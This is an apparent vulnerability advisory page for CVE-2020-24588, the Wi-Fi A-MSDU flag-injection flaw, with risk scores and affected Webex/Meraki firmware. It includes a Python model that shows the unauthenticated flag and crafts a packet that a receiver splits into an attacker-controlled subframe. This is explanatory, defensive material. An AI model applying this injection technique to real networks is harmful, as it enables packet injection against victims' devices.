CVE-2020-24588

moderate-risk
Published 2021-05-11

The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that the A-MSDU Present flag in the plaintext QoS Control header field be authenticated. Against devices that accept non-SPP (Signaling and Payload Protected) A-MSDU frames, which is mandatory as part of 802.11n, an adversary can flip that flag on an encrypted frame in transit without invalidating its integrity check, so the receiver parses an ordinary frame as an aggregate and the adversary can abuse this to inject arbitrary network packets.
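The Python example below is added here and is not part of the original entry or of any vendor's code. It models the two halves of the issue as documented in the public FragAttacks research on this CVE: first, the CCMP additional authenticated data (AAD) construction, in which bit 7 of the QoS Control field (A-MSDU Present) is masked out unless SPP A-MSDU was negotiated, so flipping it leaves the MIC valid; second, the reinterpretation of an ordinary MSDU as an A-MSDU, where the IP Identification field of a packet sent by an attacker-controlled server lands on the first subframe's Length field and the attacker's payload supplies a second, fully controlled subframe. All MAC and IP addresses, the IP ID of 30, and the payload are constructed sample values. The AES-CCM computation itself is omitted: identical AAD, nonce and ciphertext necessarily produce the same MIC, so comparing AADs is sufficient to show the flag is unprotected.

```python
import struct

# Constructed sample values (not from the advisory): the RFC 1042 LLC/SNAP header
# that precedes every IPv4 MSDU on Wi-Fi, plus two made-up MAC addresses.
LLC_SNAP_IPV4 = bytes.fromhex("aaaa030000000800")
VICTIM_MAC = bytes.fromhex("020000000001")
ATTACKER_MAC = bytes.fromhex("020000000002")
QC_AMSDU_PRESENT = 0x0080  # bit 7 of the QoS Control field


def ccmp_aad(fc, a1, a2, a3, seq_ctrl, qos_ctrl, spp_amsdu):
    """CCMP AAD for a QoS Data frame without Address 4 (IEEE 802.11-2016, 12.5.3.3.3).
    FC: subtype bits 4-6, Retry, PwrMgt, MoreData and Order masked; Protected set.
    SC: sequence number masked, fragment number kept.
    QC: TID kept; A-MSDU Present is kept ONLY when SPP A-MSDU was negotiated.
    Without SPP the bit is simply absent from what the MIC covers."""
    fc_masked = (fc & ~(0x0070 | 0x0800 | 0x1000 | 0x2000 | 0x8000)) | 0x4000
    sc_masked = seq_ctrl & 0x000F
    qc_masked = qos_ctrl & (0x000F | (QC_AMSDU_PRESENT if spp_amsdu else 0))
    return struct.pack("<H", fc_masked) + a1 + a2 + a3 + struct.pack("<HH", sc_masked, qc_masked)


def aad_changes_when_flag_flipped(spp_amsdu):
    """True if toggling A-MSDU Present changes the AAD (and therefore the CCMP MIC)."""
    fc, sc, qc = 0x0088, 0x0120, 0x0005  # QoS Data frame, seq 18 / frag 0, TID 5
    a1, a2, a3 = VICTIM_MAC, ATTACKER_MAC, ATTACKER_MAC
    original = ccmp_aad(fc, a1, a2, a3, sc, qc, spp_amsdu)
    tampered = ccmp_aad(fc, a1, a2, a3, sc, qc ^ QC_AMSDU_PRESENT, spp_amsdu)
    return original != tampered


def ipv4_packet(src, dst, proto, payload, ip_id=0):
    """Minimal IPv4 packet (no options) with a correct header checksum."""
    hdr = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ip_id, 0, 64, proto, 0, src, dst)
    csum = sum(struct.unpack(">10H", hdr))
    csum = (csum & 0xFFFF) + (csum >> 16)
    csum = (csum & 0xFFFF) + (csum >> 16)
    return hdr[:10] + struct.pack(">H", ~csum & 0xFFFF) + hdr[12:] + payload


def parse_amsdu(payload):
    """Split a (non-short) A-MSDU into (DA, SA, msdu) tuples per 802.11 9.3.2.2.2:
    each subframe is DA(6) SA(6) Length(2, big-endian) MSDU, padded to 4 octets."""
    subframes, off = [], 0
    while off + 14 <= len(payload):
        da, sa = payload[off:off + 6], payload[off + 6:off + 12]
        (length,) = struct.unpack(">H", payload[off + 12:off + 14])
        msdu = payload[off + 14:off + 14 + length]
        if len(msdu) < length:
            break  # truncated subframe; a real receiver discards the aggregate
        subframes.append((da, sa, msdu))
        off = (off + 14 + length + 3) & ~3
    return subframes


# The packet the attacker wants the victim's stack to process (constructed sample).
INJECTED_MSDU = LLC_SNAP_IPV4 + ipv4_packet(b"\xc0\xa8\x01\x01", b"\xc0\xa8\x01\x2a", 17, b"INJECTED")


def build_victim_msdu():
    """Plaintext of an ordinary, non-aggregated QoS Data frame carrying an IPv4 packet
    from an attacker-controlled server (203.0.113.1) to the victim (192.168.1.42).
    Only the IP ID and the payload are attacker-chosen; the rest is what any such
    packet looks like on the air once the LLC/SNAP header is prepended."""
    # Read as an A-MSDU, bytes 0-5 become DA (aa:aa:03:00:00:00), bytes 6-11 SA, and
    # bytes 12-13, the IP Identification field, become the first subframe's Length.
    # ID=30 ends that subframe at offset 44: 4-byte aligned and 16 bytes into the IP
    # payload, where the filler (standing in for a UDP header plus 8 bytes) ends.
    filler = b"A" * 16
    second_subframe = VICTIM_MAC + ATTACKER_MAC + struct.pack(">H", len(INJECTED_MSDU)) + INJECTED_MSDU
    ip = ipv4_packet(b"\xcb\x00\x71\x01", b"\xc0\xa8\x01\x2a", 17, filler + second_subframe, ip_id=30)
    return LLC_SNAP_IPV4 + ip


def subframes_after_flag_flip():
    """What a non-SPP receiver extracts once A-MSDU Present has been set on the frame
    above: a garbage first subframe, then the attacker's packet addressed to the victim."""
    return parse_amsdu(build_victim_msdu())


if __name__ == "__main__":
    print("AAD changes without SPP:", aad_changes_when_flag_flipped(False))
    print("AAD changes with SPP:   ", aad_changes_when_flag_flipped(True))
    for i, (da, sa, msdu) in enumerate(subframes_after_flag_flip()):
        print(f"subframe {i}: DA={da.hex(':')} SA={sa.hex(':')} len={len(msdu)}")
```

The first subframe is harmless because its destination aa:aa:03:00:00:00 matches no host; the second is delivered as if the victim's own network had sent it, which is what makes the page's "inject arbitrary network packets" concrete. The SPP variant of the same call shows the standard's intended fix: once both peers negotiate SPP A-MSDU, the bit is covered by the MIC and the flip is detected.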

Do I need to act?

EPSS: 0.31% chance of exploitation (low exploit probability)
CISA KEV: not listed; no confirmed active exploitation reported to CISA
Patch status: unknown; check vendor advisories for fix availability and mitigation guidance
CVSS: 3.5/10 (Low); attack vector ADJACENT_NETWORK, attack complexity LOW

Affected Products (20; 17 listed on this page)

Meraki Z3C Firmware
Webex Board 55 Firmware
Webex Board 55S Firmware
Webex Board 70 Firmware
Webex Board 70S Firmware
Webex Board 85S Firmware
Webex Dx70 Firmware
Webex Dx80 Firmware
Webex Room 55 Firmware
Webex Room 55 Dual Firmware
Webex Room 70 Firmware
Webex Room 70 Dual Firmware
Webex Room 70 Dual G2 Firmware
Webex Room 70 Single Firmware
Webex Room 70 Single G2 Firmware
Webex Room Kit Firmware
Webex Room Kit Mini Firmware

Risk score: 47/100 (moderate-risk)
Severity: 13/34, Low
Exploitability: 1/34, Minimal
Exposure: 33/34, Critical